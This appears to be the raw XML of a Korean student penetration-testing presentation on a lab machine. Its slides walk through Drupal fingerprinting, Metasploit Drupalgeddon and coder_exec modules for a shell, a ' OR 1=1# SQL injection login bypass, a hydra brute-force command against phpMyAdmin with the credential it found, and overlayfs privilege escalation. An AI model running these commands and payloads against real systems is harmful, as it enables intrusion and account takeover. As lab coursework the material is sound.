        <p:spPr>
          <a:xfrm>
            <a:off x="352319" y="7398782"/>
            <a:ext cx="1230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기존 코드에서 새로 코드를 생성하고 컴파일 하는 부분을 주석처리 한 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만들어져야 하는 코드를 따로 만들어 컴파일 해 준다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6E10AD-0595-450B-A362-FD3356D351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300" y="3012152"/>
            <a:ext cx="5400000" cy="294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615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#13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overlayfs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>권한 상승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27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2AAC91F-787E-4A8A-AA09-A4C9BC263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835" y="1695022"/>
            <a:ext cx="9893130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8E2CF09-A1D0-43D3-8503-43906A54CFDA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3109484" y="7554501"/>
            <a:ext cx="678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만들어진 파일들을 앞서 말한 방법으로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victim machine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옮긴다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5672061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#13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overlayfs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>권한 상승</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>)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28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5FEE9EC-0E8E-429C-B7F3-6D210680F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515271"/>
            <a:ext cx="5400000" cy="29475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6D15081-29AF-4DCB-90C9-D984602619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302" y="1777632"/>
            <a:ext cx="5400000" cy="44227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AA8AEE1-5119-40BD-B770-20B163E237EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1461597" y="7074577"/>
            <a:ext cx="10081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/var/www/html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공유 받은 파일들을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tmp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복사한다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tmp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디렉토리에서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exploit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실행시키면 좌측 사진과 같이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root shell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딴 것을 확인할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3306403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#1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drupal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> page </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>정보 알아내기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96EA00-B5D5-43A3-B1F5-DCBE90874D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90" y="1567622"/>
            <a:ext cx="10066020" cy="540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384E62-B8BC-4D2B-B14E-65A1E4E5BD8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2251075" y="7516440"/>
            <a:ext cx="103300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앞선 페이지에서는 특별한 정보를 찾기 어렵지만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F12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를 눌러 페이지 정보를 살펴보면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[target IP]/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drupal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/modules/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정보를 가져오는 것을 볼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991AF9A-0364-43D5-86A3-BF575E3E2315}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3439160" y="3972560"/>
            <a:ext cx="3176896" cy="4775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872465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#1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drupal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> page </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>정보 알아내기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D269CDA-6863-4655-8D25-60128B76A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1" y="2565897"/>
            <a:ext cx="5400000" cy="28968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CBE623-4B7F-4EB0-AB9D-8D2171FAC034}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1761358" y="6119446"/>
            <a:ext cx="94820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[target IP]/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drupal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/modules/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들어가보면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drupal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대한 다양한 정보들을 얻을 수 있으며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[target IP]/drupal/modules/blog/blog.info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파일을 다운 받아 보면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version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정보도 알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&lt;info&gt;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version = “7.5”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project = “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drupal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”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26BF3F7-40E7-4476-9BC4-F0CC450A6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300" y="2565897"/>
            <a:ext cx="5400000" cy="289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321006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#2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drupal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>을 이용하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>user shell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>얻기</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>1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FB97E09-EA20-4E10-90D0-38A25E5EC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835" y="1695022"/>
            <a:ext cx="9893130" cy="540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7FE2178-D5CA-44D5-9C64-047060C318CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1409499" y="7512448"/>
            <a:ext cx="101858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앞서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drupal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page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의 정보들을 쉽게 얻어냈기에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msfconsole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drupal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이용한 공격들을 살펴봤다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#2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에서는 이 중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exploit/multi/http/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drupal_drupageddon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사용한 공격에 대해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#3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에서는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exploit/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unix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webapp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drupal_coder_exec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사용한 공격에 대해 소개할 것이다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879167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#2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drupal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>을 이용하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>user shell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>얻기</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>1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6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BF0CB9-0282-4BA0-B721-07713B742C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835" y="1567622"/>
            <a:ext cx="9893130" cy="540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004E38-3E45-4344-8F85-938BD9E098E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2832965" y="7215352"/>
            <a:ext cx="73388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use exploit/multi/http/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drupal_drupageddon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set RHOSTS [target IP]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set TARGETURI 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drupal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run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해주면 위와 같이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www-data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유저의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shell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얻는 것을 확인할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8942520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#3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 err="1"/>
              <a:t>drupal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>을 이용하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>user shell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>얻기</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>2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7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32014D-27C9-4426-8ED2-3B4013EFB7E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2724762" y="7215352"/>
            <a:ext cx="755527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use exploit/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unix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webapp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drupal_coder_exec</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR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set RHOSTS [target IP]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set TARGETURI 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drupal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&gt; run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통해서도 위와 같이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www-data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유저의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shell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얻는 것을 확인할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CFD7AC9-67C3-4ADD-8F35-86C29CDAF9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5834" y="1482732"/>
            <a:ext cx="989313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85905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#4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payroll </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> injection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8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D0B18B-9BC7-438F-85D7-6CA45D09B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500" y="2707381"/>
            <a:ext cx="5400000" cy="28968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8F610B0-F202-4F98-BDC3-A7BEEAE77D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2302" y="2707380"/>
            <a:ext cx="5400000" cy="28968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E2DEE5-337B-49EC-A0A3-E55135498B15}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1719680" y="6280758"/>
            <a:ext cx="95654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[target IP]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 접속 시 있던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payroll_app.php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들어가보면 좌측 사진과 같이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 page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가 나온다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아이디에 아래와 같은 문자열을 입력하여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SQL injection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시도하였으며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‘ OR 1=1#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우측과 같이 로그인에 성공한 것을 알 수 있다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093253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object 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-16358"/>
            <a:ext cx="13004801" cy="91982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61" name="vsftp"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="952500" y="-348437"/>
            <a:ext cx="11099800" cy="1583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ko-KR" altLang="en-US" dirty="0"/>
              <a:t>공격기법 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>#5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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>phpMyAdmin brute force</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16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388744" y="9399258"/>
            <a:ext cx="227312" cy="3429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sp>
        <p:nvSpPr>
          <p:cNvPr id="162" name="object 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-50801" y="9357921"/>
            <a:ext cx="13301962" cy="41948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 algn="l" defTabSz="914400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089B630-2804-4F88-800D-BEE0BD574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2300" y="1442901"/>
            <a:ext cx="5400000" cy="2947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8B6516-F06F-4E2B-BC03-80840A8ED43A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1934307" y="7537118"/>
            <a:ext cx="91361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여러 페이지들을 뒤지면서 얻는 의미 있어 보이는 단어들을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wordlist.txt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따로 저장한 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hydra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명령어를 이용하여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phpMyAdmin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페이지를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brute force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공격해 보았다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</a:p>
          <a:p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$ hydra –L [path/wordlist.txt] –P [path/wordlist.txt] http-post-form “/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phpmyadmin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index.php:pma_username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=^USER^&amp;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pma_password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=^PASS^:#”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그 결과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phpMyAdmin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root/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sploitme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라는 계정으로 로그인이 가능한 것을 알아냈으며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</a:t>
            </a:r>
          </a:p>
          <a:p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이는 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 shell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을 딴 후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payroll_app.php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파일을 읽었을 때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en-US" altLang="ko-KR" dirty="0" err="1">
                <a:latin typeface="나눔고딕" panose="020D0604000000000000" pitchFamily="50" charset="-127"/>
                <a:ea typeface="나눔고딕" panose="020D0604000000000000" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>mysqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:latin typeface="나눔고딕" panose="020D0604000000000000" pitchFamily="50" charset="-127"/>
                <a:ea typeface="나눔고딕" panose="020D0604000000000000" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>에 적힌 계정 정보이다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:latin typeface="나눔고딕" panose="020D0604000000000000" pitchFamily="50" charset="-127"/>
                <a:ea typeface="나눔고딕" panose="020D0604000000000000" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US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C4A383E-8DE8-4DC8-B677-DF941D1D1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1" y="1443559"/>
            <a:ext cx="5400000" cy="2947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5A1B44-2B03-4F97-93E1-F482D38375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02399" y="4436271"/>
            <a:ext cx="5400000" cy="292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016559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소포">
  <a:themeElements>
    <a:clrScheme name="소포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소포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소포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{A971FE02-D10F-C34F-88F8-377DEADFB3FA}tf10001120</Template>
  <TotalTime>5396</TotalTime>
  <Words>1738</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>사용자 지정</PresentationFormat>
  <Paragraphs>176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Helvetica Neue</vt:lpstr>
      <vt:lpstr>나눔고딕</vt:lpstr>
      <vt:lpstr>휴먼매직체</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Gill Sans MT</vt:lpstr>
      <vt:lpstr>소포</vt:lpstr>
      <vt:lpstr>목차</vt:lpstr>
      <vt:lpstr>공격기법 #1 – drupal page 정보 알아내기</vt:lpstr>
      <vt:lpstr>공격기법 #1 – drupal page 정보 알아내기</vt:lpstr>
      <vt:lpstr>공격기법 #1 – drupal page 정보 알아내기</vt:lpstr>
      <vt:lpstr>공격기법 #2 – drupal을 이용하여 user shell 얻기1</vt:lpstr>
      <vt:lpstr>공격기법 #2 – drupal을 이용하여 user shell 얻기1</vt:lpstr>
      <vt:lpstr>공격기법 #3 – drupal을 이용하여 user shell 얻기2</vt:lpstr>
      <vt:lpstr>공격기법 #4 – payroll sql injection</vt:lpstr>
      <vt:lpstr>공격기법 #5 – phpMyAdmin brute force</vt:lpstr>
      <vt:lpstr>공격기법 #6 – chat을 이용한 attack</vt:lpstr>
      <vt:lpstr>공격기법 #7 – continuum 취약점</vt:lpstr>
      <vt:lpstr>공격기법 #7 – continuum 취약점</vt:lpstr>
      <vt:lpstr>공격기법 #8 – phpmyadmin 취약점</vt:lpstr>
      <vt:lpstr>공격기법 #8 – phpmyadmin 취약점</vt:lpstr>
      <vt:lpstr>공격기법 #9 – Wdruf.php 페이지 취약점</vt:lpstr>
      <vt:lpstr>공격기법 #9 – Wdruf.php 페이지 취약점</vt:lpstr>
      <vt:lpstr>공격기법 #9 – Wdruf.php 페이지 취약점</vt:lpstr>
      <vt:lpstr>공격기법 #9 – Wdruf.php 페이지 취약점</vt:lpstr>
      <vt:lpstr>공격기법 #10 – Ruby on rails readme 취약점</vt:lpstr>
      <vt:lpstr>공격기법 #11 – drupal 계정 얻기</vt:lpstr>
      <vt:lpstr>공격기법 #11 – drupal 계정 얻기</vt:lpstr>
      <vt:lpstr>공격기법 #11 – drupal 계정 얻기</vt:lpstr>
      <vt:lpstr>공격기법 #11 – drupal 계정 얻기</vt:lpstr>
      <vt:lpstr>공격기법 #12 – 파일 공유</vt:lpstr>
      <vt:lpstr>공격기법 #13 – overlayfs(권한 상승)</vt:lpstr>
      <vt:lpstr>공격기법 #13 – overlayfs(권한 상승)</vt:lpstr>
      <vt:lpstr>공격기법 #13 – overlayfs(권한 상승)</vt:lpstr>
      <vt:lpstr>공격기법 #13 – overlayfs(권한 상승)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기말과제</dc:title>
  <cp:lastModifiedBy>SAMSUNG</cp:lastModifiedBy>
  <cp:revision>236</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-01-17T05:30:12Z</dcterms:modified>
</cp:coreProperties>
</file>